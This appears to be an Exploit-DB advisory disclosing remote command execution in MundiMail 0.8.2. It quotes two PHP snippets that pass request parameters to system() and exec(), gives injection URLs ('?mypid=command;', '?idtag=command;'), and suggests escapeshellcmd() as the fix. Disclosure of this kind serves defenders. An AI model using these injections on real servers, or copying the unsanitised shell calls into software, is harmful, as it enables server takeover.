MundiMail 0.8.2 - Remote Code Execution

Author: Dedalo
type: webapps
platform: php
port: 
date_added: 2009-09-06 
date_updated: 2010-07-09 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commundimail-0.8.2.tar.gz

# Reference: http://www.ccat.edu.mx/advisors/advisor5/advisor5.html
# Credits: Ccat Research Labs   - México - Coatepec, Ver.  www.ccat.edu.mx

# Software Link: http://sourceforge.net/projects/mundimail/
# Tested on: Debian, Centos & Windows Server 2000

Preview:

Code uses System() and Exec() without good practices in security.


1.- First Vulnerable Code

//need to kill daemon
		$cmd = "/bin/kill";
		$cmd .= " " . $_REQUEST["mypid"];
		system($cmd);

2.- Explotation

/admin/satus/index.php?mypid=command;


3.- Fixation


$cmd .= " " . escapeshellcmd($_REQUEST["mypid"]);

4.- Second Vulnerable Code

$cmd = ROOTDIR . "include/massmail.php";
		$cmd .= ' ' . $_REQUEST["idtag"];
		$cmd .= ' > /dev/null';
		$cmd .= ' &';
		echo $cmd . "<br>\n";
		exec($cmd);
		$mid = "../mail/success.php";

5.- Explotation

/admin/status/index.php?idtag=command;


6.-fixation

$cmd .= ' ' . escapeshellcmd($_REQUEST["idtag"]);


7.- Other

We Can use other types of Fixation bug this is an easy one ;)


8.- Greetz

www[dot]seguridadblanca[dot]com


--------------
Happy Hacking
--------------